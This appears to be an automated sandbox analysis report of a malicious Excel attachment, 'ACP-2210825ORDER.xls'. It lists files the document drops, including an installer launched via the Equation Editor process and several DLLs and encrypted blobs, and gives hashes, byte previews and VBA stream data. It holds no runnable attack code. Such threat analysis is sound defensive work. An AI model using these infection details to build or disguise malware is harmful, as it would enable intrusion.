      SSDEEP:768:2DONBmwaWFloY6jKV8g5d1KnK1LXMpaCnwSOybdY0p:mONIwaWFlajKpk6LXMpVTT
      MD5:35F7C4CEEC52F37D0B0881CCC3A7612D
      SHA1:3FC1E0B485071C1725703E6CB1029485B895765F
      SHA-256:17918DE803C9609AB1D8BF011FC75835E43FF490299D7D67EAB7F550E1FC0968
      SHA-512:ACE05DA7132DEEBF169C45D3C726B34B8DEE745F00109ABED41B6A6A4D6AE2DD1010AAD7C4FC08DA96335C33D4B6D7A49A24E2621812D15D6FEA584CEE34156B
      Malicious:false
      Preview:....l...............m............J..sK.. EMF....l...8...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..............................................{.......%...........%...........R...p................................@."C.a.l.i.b.r.i......................................................x$....._..f.x.@..%....._..._.....l._..._.RQ.Rl._.d._......._.P._.$Q.Rl._.d._. ...Id.xd._.l._. ............d.x................................@1......%...X...%...7...................{$..................C.a.l.i.b.r.i.......,._....x..y.._..._..8.x........dv......%...........%...........%...................................!.......................{......."...........%...........%...........%...........T...T..........................@.E.@....n.......L...............{.......P... ...6...F...........EMF+*@..$..........?...........?.........@...........@..........*@..$..........?....

      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\95D0DCC2.emf

      Download File
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
      Category:dropped
      Size (bytes):17500
      Entropy (8bit):2.2724443756862973
      Encrypted:false
      SSDEEP:96:uRiEE000XyDcvSRiGGWWWRNN/aP2iGGWWWZmCI8bMGBvWbkmIg:d0kMc4
      MD5:831E92F84F915D931EE02260D16AC145
      SHA1:51C81E34BEBE02A91EA7DA9F275E9EFD72547D01
      SHA-256:C4CAD71039044EFBE493BD54FD3A00FB9C35FF9CC8BA47F668490A3803378594
      SHA-512:E85B4B468A2E9F76CCAD6CFFEC6478138046B0F335C6409D7F0849A4755D4C57477FE587624AD8EF418AA829B79183C975EF2858B3052022686BC812DC974C78
      Malicious:false
      Preview:....l...........`...0...........uN..p... EMF....\D..........................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...............................................a...1..."...........!...............................................a...1..."...........!...............................................a...1..."...........!...............................................a...1..."...........!...............................................a...1..."...........!...............................................a...1...'.......................%...........................................................&...........................%...........................6.......`.......%...........L...d..........._...............`.......!...

      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9BAF1916.emf

      Download File
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
      Category:dropped
      Size (bytes):321644
      Entropy (8bit):2.239527826723405
      Encrypted:false
      SSDEEP:768:2DONBmwaWFloY6jKV8g5d1KnK1LXMpaCnwSOybdY0p:mONIwaWFlajKpk6LXMpVTT
      MD5:35F7C4CEEC52F37D0B0881CCC3A7612D
      SHA1:3FC1E0B485071C1725703E6CB1029485B895765F
      SHA-256:17918DE803C9609AB1D8BF011FC75835E43FF490299D7D67EAB7F550E1FC0968
      SHA-512:ACE05DA7132DEEBF169C45D3C726B34B8DEE745F00109ABED41B6A6A4D6AE2DD1010AAD7C4FC08DA96335C33D4B6D7A49A24E2621812D15D6FEA584CEE34156B
      Malicious:false
      Preview:....l...............m............J..sK.. EMF....l...8...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..............................................{.......%...........%...........R...p................................@."C.a.l.i.b.r.i......................................................x$....._..f.x.@..%....._..._.....l._..._.RQ.Rl._.d._......._.P._.$Q.Rl._.d._. ...Id.xd._.l._. ............d.x................................@1......%...X...%...7...................{$..................C.a.l.i.b.r.i.......,._....x..y.._..._..8.x........dv......%...........%...........%...................................!.......................{......."...........%...........%...........%...........T...T..........................@.E.@....n.......L...............{.......P... ...6...F...........EMF+*@..$..........?...........?.........@...........@..........*@..$..........?....

      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BC7C3885.emf

      Download File
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
      Category:dropped
      Size (bytes):17500
      Entropy (8bit):2.2754571047715912
      Encrypted:false
      SSDEEP:96:uRiEE000XyDcvSRiGGWWWRNN/uf2iGGWWWZmCI8bUaBvWbkmIg:d0EUI4
      MD5:38A09794AE082E08EA4F8B6E517F4814
      SHA1:8B7DF3EE701A7E43BBD9A1AC03A7C342FDB4F2B5
      SHA-256:22A5F86B243A131E89E06FF0FA824A09369D1878DC1F1C4E3527FFDDBEFF70F3
      SHA-512:2BF53BB29C684C2D54ADEA3D1877A31DF011A9B58EDCF54FCE697291BEC9056591BB3BDE95DC05BC1A3474A721B2889E4312903479782823F0606BD32B4243E5
      Malicious:false
      Preview:....l...........`...0...........uN..p... EMF....\D..........................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...............................................a...1..."...........!...............................................a...1..."...........!...............................................a...1..."...........!...............................................a...1..."...........!...............................................a...1..."...........!...............................................a...1...'.......................%...........................................................&...........................%...........................6.......`.......%...........L...d..........._...............`.......!...

      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C6BD8529.emf

      Download File
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
      Category:dropped
      Size (bytes):17500
      Entropy (8bit):2.2724443756862973
      Encrypted:false
      SSDEEP:96:uRiEE000XyDcvSRiGGWWWRNN/aP2iGGWWWZmCI8bMGBvWbkmIg:d0kMc4
      MD5:831E92F84F915D931EE02260D16AC145
      SHA1:51C81E34BEBE02A91EA7DA9F275E9EFD72547D01
      SHA-256:C4CAD71039044EFBE493BD54FD3A00FB9C35FF9CC8BA47F668490A3803378594
      SHA-512:E85B4B468A2E9F76CCAD6CFFEC6478138046B0F335C6409D7F0849A4755D4C57477FE587624AD8EF418AA829B79183C975EF2858B3052022686BC812DC974C78
      Malicious:false
      Preview:....l...........`...0...........uN..p... EMF....\D..........................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...............................................a...1..."...........!...............................................a...1..."...........!...............................................a...1..."...........!...............................................a...1..."...........!...............................................a...1..."...........!...............................................a...1...'.......................%...........................................................&...........................%...........................6.......`.......%...........L...d..........._...............`.......!...

      C:\Users\user\AppData\Local\Temp\nsp5B93.tmp\System.dll

      Download File
      Process:C:\Users\Public\vbc.exe
      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
      Category:modified
      Size (bytes):11776
      Entropy (8bit):5.656065698421856
      Encrypted:false
      SSDEEP:192:eY24sihno00Wfl97nH6T2enXwWobpWBTU4VtHT7dmN35Ol+Sl:E8QIl975eXqlWBrz7YLOl+
      MD5:17ED1C86BD67E78ADE4712BE48A7D2BD
      SHA1:1CC9FE86D6D6030B4DAE45ECDDCE5907991C01A0
      SHA-256:BD046E6497B304E4EA4AB102CAB2B1F94CE09BDE0EEBBA4C59942A732679E4EB
      SHA-512:0CBED521E7D6D1F85977B3F7D3CA7AC34E1B5495B69FD8C7BFA1A846BAF53B0ECD06FE1AD02A3599082FFACAF8C71A3BB4E32DEC05F8E24859D736B828092CD5
      Malicious:false
      Antivirus:
      • Antivirus: ReversingLabs, Detection: 2%
      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1...u.u.u...s.u.a....r.!..q....t....t.Richu.........................PE..L.....MX...........!..... ...........'.......0...............................`.......................................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..S....0.......$..............@..@.data...x....@.......(..............@....reloc..b....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................

      C:\Users\user\AppData\Local\Temp\~DF15E3E53C3844A1B8.TMP

      Download File
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:data
      Category:dropped
      Size (bytes):512
      Entropy (8bit):0.0
      Encrypted:false
      SSDEEP:3::
      MD5:BF619EAC0CDF3F68D496EA9344137E8B
      SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
      SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
      SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
      Malicious:false
      Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

      C:\Users\user\AppData\Local\Temp\~DF357B58C09F937A89.TMP

      Download File
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:data
      Category:dropped
      Size (bytes):512
      Entropy (8bit):0.0
      Encrypted:false
      SSDEEP:3::
      MD5:BF619EAC0CDF3F68D496EA9344137E8B
      SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
      SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
      SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
      Malicious:false
      Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

      C:\Users\user\AppData\Local\Temp\~DF688530565CAD41F4.TMP

      Download File
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Tue Nov 29 05:27:07 2022, Security: 1
      Category:dropped
      Size (bytes):1130496
      Entropy (8bit):7.090671625727551
      Encrypted:false
      SSDEEP:24576:mLsr5XXXXXXXXXXXXUXXXXXXXSXXXXXXXXzmZr5XXXXXXXXXXXXUXXXXXXXSXXXd:Ch
      MD5:0E013B64C85479178FE144D0F1AB7C4B
      SHA1:D05316B326B2DA075C00246DE6E3CBFB8B255A96
      SHA-256:CAB79276FB8419A70BAAC774C9DB91D16ED1DADF5F5624C4148E7F1975FDFF94
      SHA-512:34699E3C80C5F5E95C876D5794E05701C1726E04A46AF9976CB6415551688B97F39DFC78556F4F7A0588B4E24111663F7BAC1D188E80F256BAE5821BAFCCE5B0
      Malicious:true
      Antivirus:
      • Antivirus: Avira, Detection: 100%
      Preview:......................>...............................................................m...n...\...]...^...............................n.......p...........................................................................................................................................................................................................................................................................................................................................................................................H...............................................................................................i...Z........... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

      C:\Users\user\AppData\Local\Temp\~DFEB3257B002629434.TMP

      Download File
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:data
      Category:dropped
      Size (bytes):512
      Entropy (8bit):0.0
      Encrypted:false
      SSDEEP:3::
      MD5:BF619EAC0CDF3F68D496EA9344137E8B
      SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
      SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
      SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
      Malicious:false
      Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

      C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Stempelpligtig93\Obeyeo.Bib

      Download File
      Process:C:\Users\Public\vbc.exe
      File Type:data
      Category:dropped
      Size (bytes):178824
      Entropy (8bit):6.515135274289935
      Encrypted:false
      SSDEEP:1536:Aqnh3ZWvlivpBh2LolEVEF+F2MVQ454gp3cHE6xBiP29vpAX5D57DwVaDXW:RkYzh2Lol/FdUJNfPgk5DVDUd
      MD5:52F571D999E9DD5B6ABFFE0CC9BF8DF3
      SHA1:67743CD31368EA4C7C350C5071A6B1D8A5AF400B
      SHA-256:7CC58916DBEADFF389E9375FD1F8973DB606156E953F309C55C40384E54765E3
      SHA-512:0BA04B8CDA196099229824B65348B71483D50377D10660AF8CD70A10919A310D88DDBA80D1F595524F71764BB2A765C87B9E5E2276391B11A272A52E3BBA7C11
      Malicious:false
      Preview:...6.{..N..p2...H.=L.]......l..b.0..2).v..X..~..q..nm.9..$h....YZ..}..V.u..E.a(M..........q......@9.n.`7......z.N...<...&..h..\.....&.h@p.....%.~5._b..b........B(....:.4......t.S0..J..0.h.&..H.t.gV.&..y.,J.3...m..\.......~n..L.AnI.....C.a.7w^!9.D.]J.....p...C8..Hn.....14.|.. ...k........_9......@%......S..d.>.*I.9.@.....l.....,.4G.l.}..e....<......]...wj.Z.^...j.Fv.#..9n.c{.`..4U...,Q...v.g.t)..o...g......E.}..9...1....Wbl..JT%8..m[x.a.u.7.i)......1+..$l@...x$.~......6q.BE.x..7...n.n..gOZ.V.7..6.a!.c....`.vGm).."L#~..E......tV.....DjX.....Z.>..Z.).c...............D7}d.v.. ..%...v.fH.....Cw..x.^......b\ct....Y.*.g.b...1*cR..%6F'.......Q-.......GH....L!?1...<.^Rf.G.H[O.<.Ke.....R..._e..1..s........y.~..x!...Tl.... .a .;..KG.]%:."%.O..X.S..b..t.o{.......#..9...b..J.e..w...<~b........5................XC....Z....E.zE.g.k.X.^.=.W)...>.'K.h<.C\././.7.d......~./.a~.Yc.......4...{....d..m."...v........v"......iY....9..ka.....M...m.}).....Y..f..-..4..

      C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Stempelpligtig93\Vatersotiges\Knoglemarvsundersgelsen\Armoniac\Urokkeligheden.Ord114

      Download File
      Process:C:\Users\Public\vbc.exe
      File Type:data
      Category:dropped
      Size (bytes):119298
      Entropy (8bit):7.998253263209972
      Encrypted:true
      SSDEEP:1536:6JcdhM4/003cKP7zr9UE0q19q9MUxJ0O1mwVrLSft3KeDQMjE4le/l1NUYeECfZm:LdhM4/Fpb/1Ca2LEt9DQMA4lGVUh14B
      MD5:251C92F85825E5BBBE4D7624FC7F4AE4
      SHA1:BF396458B8D37DCC5880B29A7482A4896828C35F
      SHA-256:20694D441EEAB696B6D6AE5B7785BB0CAD19E1708EF49C28737CAD1805B49CDC
      SHA-512:5730DF53CE6DE9791F81287EA340ECDECEF1B99B80DC7501F9739083AF5D66543795E82C19388522580A43B8553FEAA2D5C0B419502BC7325E34F1862BBD44DD
      Malicious:false
      Preview:...Ct.m.j\i...G..@k......D.....W.S.CE.P'.O....9l....4Y%\.R...%..'.D.o.%9h........vP.h0...E_..1.}................{...).h....F.r..lm....D..{..dF4.@F..=.....G..&....... v47.L..V..%.$x..rK..ue=.w.)..+b...$.m.Gj..@x.3...14J...#"....G| v8@Y2.R..v.."j...~.,..<..}...&H9F..v..=....>;......HF..c...~..'c.f.p0"...>Q|./."...n..t.............$^.Z.c....h(.df.B..`,..#.?s.8..k'.B.t.....<3..s..h-).Q..\R.O.C=.c.<S..b(..Q#.....r...j..z...U.vU.>..C...@...G-..7=.....".mu52.[...`Bf}0q.V.lF.|(.pMo...^L.l.@.#[bH...1..I.l.Mi..iB..(N"$e.....r..9....1z.2..P.G*H..p....sE..O.cR.l.Z.H/.u_.Z+"Rk.M.g..q....Z..{0...*g....,:....t..QF2.oA.v{....h.....TIN...r.. O.u..P...(........G.....+kk%9W.b.I.Q.....Gy9^~./..Q8..!o]$.5.....4. };......80....ze.^l....WL.b....!..0.N.{Q...'.....I..dnP....7.p..aB.w.Z.v]R.../r.C6(q.C...%...n....2@..0$.X.;CW.1...5...s#.]..x[h..T./.>.(...dJ...q?._.I....K...1'....9.).n1#..5:&.S3^........Z.Z.0.c._.'.....r;bw.P.....K.^.....(....'..4.?....N....#.

      C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Stempelpligtig93\Vatersotiges\Knoglemarvsundersgelsen\Armoniac\libgiognutls.dll

      Download File
      Process:C:\Users\Public\vbc.exe
      File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
      Category:dropped
      Size (bytes):131991
      Entropy (8bit):5.8780987492725405
      Encrypted:false
      SSDEEP:1536:v6J1cdTEl2OzvUtevCuoCW9fPr+vo9F5J7YWv3vbRnBycYWOGWSeaGymtYWOGWSS:VdW2OLgNCwXKSH8WPvVBjA+KE8S5
      MD5:10D998CF80B4437C2979B25EBCBE16D1
      SHA1:79C99DD2ABB99253E41C5E40DAB29522F93345BB
      SHA-256:A0A87BC30F4B39D7B642841A10208CE5286C6CA712B28B9D921E1EA6F547AEE6
      SHA-512:44863645B48815C3C248111F86440E3A0C515AF61B5A17D15B5A6C7304277F76056BCEB6C579E7824E11ADCA4DB3E385FA8019D602C40FA527E725C09B6AA523
      Malicious:true
      Antivirus:
      • Antivirus: ReversingLabs, Detection: 0%
      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................&"...%............P........................................@......g}....`... .................................................lE...........................0.............................. i..(....................................................text...X...........................`..`.data........ ......................@....rdata...A...0...B..................@..@.pdata...............R..............@..@.xdata..X............`..............@..@.bss....p................................edata...............n..............@..@.idata..lE.......F...p..............@....CRT....X...........................@....tls......... ......................@....reloc.......0......................@..B........................................................................................................................................................................

      C:\Users\Public\vbc.exe

      Download File
      Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
      File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
      Category:dropped
      Size (bytes):477800
      Entropy (8bit):7.505402259729816
      Encrypted:false
      SSDEEP:12288:Lz772qgvq2nLm4W2RPLKb+nFzIQ3Ja8TA:gXnS4W2RPLKm/of
      MD5:7081C4822CF1C7572DD82822B8F27C49
      SHA1:4EE3B6C423B1C9EBF5BEFBC73D1EEF0C576CF026
      SHA-256:B5330F82F3C5C3F223AE9DECD3EBDCD74D1A13D95B1C42BD7B2DE4E6C6CB0083
      SHA-512:6E3377E6A47518F2267CD38646E2CEC576D41FD8A67C8C2590F43BF353C0B1F322FC229E70BC98E9C7DFAA1A11CF872A0C8E2C15A31EE90EF1C4E65EAC98EE3A
      Malicious:true
      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1..P...P...P..*_...P...P..OP..*_...P..s...P...V...P..Rich.P..........PE..L...8.MX.................b...*......J4............@..........................p............@.............................................h............5..X............................................................................................text....a.......b.................. ..`.rdata...............f..............@..@.data...8............z..............@....ndata...0...............................rsrc...h...........................@..@................................................................................................................................................................................................................................................................................................................................................................

      Static File Info

      General

      File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Tue Nov 29 05:27:07 2022, Security: 1
      Entropy (8bit):7.090542873047565
      TrID:
      • Microsoft Excel sheet (30009/1) 47.99%
      • Microsoft Excel sheet (alternate) (24509/1) 39.20%
      • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
      File name:ACP-2210825ORDER.xls
      File size:1130496
      MD5:6c84860292e2a4d210396b7012be9b8a
      SHA1:7061c26320bf8836b55ac660860fa0937ae8f48e
      SHA256:cadae8bf6a2bcf1ee630695a250a481d22d0b6d409832f60070b118dfc3bca75
      SHA512:dbeb30f6ec918e82c13ed2aea4f14eeba7a38252fda3ebba49b63b0840a529b026cb36c40927b69d95970fe83c0b09c957a5b918d124eff97bfeaf3cda77a426
      SSDEEP:24576:XLsr5XXXXXXXXXXXXUXXXXXXXSXXXXXXXXpmSr5XXXXXXXXXXXXUXXXXXXXSXXXZ:sh
      TLSH:1135BE347893CE36D9A586347BA6D5B103037C733E548A5722C3732E1AF334265D6EAA
      File Content Preview:........................>...............................................................m...n...\...]...^...............................n.......p..............................................................................................................

      File Icon

      Icon Hash:e4eea286a4b4bcb4

      Static OLE Info

      General

      Document Type:OLE
      Number of OLE Files:1

      OLE File "ACP-2210825ORDER.xls"

      Indicators
      Has Summary Info:
      Application Name:Microsoft Excel
      Encrypted Document:True
      Contains Word Document Stream:False
      Contains Workbook/Book Stream:True
      Contains PowerPoint Document Stream:False
      Contains Visio Document Stream:False
      Contains ObjectPool Stream:False
      Flash Objects Count:0
      Contains VBA Macros:True
      Summary
      Code Page:1252
      Author:
      Last Saved By:
      Create Time:2006-09-16 00:00:00
      Last Saved Time:2022-11-29 05:27:07
      Creating Application:
      Security:1
      Document Summary
      Document Code Page:1252
      Thumbnail Scaling Desired:False
      Contains Dirty Links:False
      Shared Document:False
      Changed Hyperlinks:False
      Application Version:786432

      Streams with VBA

      VBA File Name: Sheet1.cls, Stream Size: 977
      General
      Stream Path:MBD017EF321/_VBA_PROJECT_CUR/VBA/Sheet1
      VBA File Name:Sheet1.cls
      Stream Size:977
      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ] . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
      Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 5d c7 15 f4 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      VBA Code

      VBA File Name: Sheet2.cls, Stream Size: 977
      General
      Stream Path:MBD017EF321/_VBA_PROJECT_CUR/VBA/Sheet2
      VBA File Name:Sheet2.cls
      Stream Size:977
      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ] & g . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . -
      Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 5d c7 26 67 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      VBA Code

      VBA File Name: Sheet3.cls, Stream Size: 977
      General
      Stream Path:MBD017EF321/_VBA_PROJECT_CUR/VBA/Sheet3
      VBA File Name:Sheet3.cls
      Stream Size:977
      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ] . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . -
      Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 5d c7 1e 0d 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      VBA Code

      VBA File Name: ThisWorkbook.cls, Stream Size: 985
      General
      Stream Path:MBD017EF321/_VBA_PROJECT_CUR/VBA/ThisWorkbook
      VBA File Name:ThisWorkbook.cls
      Stream Size:985
      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ] K . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 1 . 9 . - .
      Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 5d c7 d5 4b 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      VBA Code

      VBA File Name: Sheet1.cls, Stream Size: 977
      General
      Stream Path:MBD017EF322/_VBA_PROJECT_CUR/VBA/Sheet1
      VBA File Name:Sheet1.cls
      Stream Size:977
      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ] . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
      Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 5d c7 15 f4 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      VBA Code

      VBA File Name: Sheet2.cls, Stream Size: 977
      General
      Stream Path:MBD017EF322/_VBA_PROJECT_CUR/VBA/Sheet2
      VBA File Name:Sheet2.cls
      Stream Size:977
      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ] & g . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . -
      Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 5d c7 26 67 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      VBA Code

      VBA File Name: Sheet3.cls, Stream Size: 977
      General
      Stream Path:MBD017EF322/_VBA_PROJECT_CUR/VBA/Sheet3
      VBA File Name:Sheet3.cls
      Stream Size:977
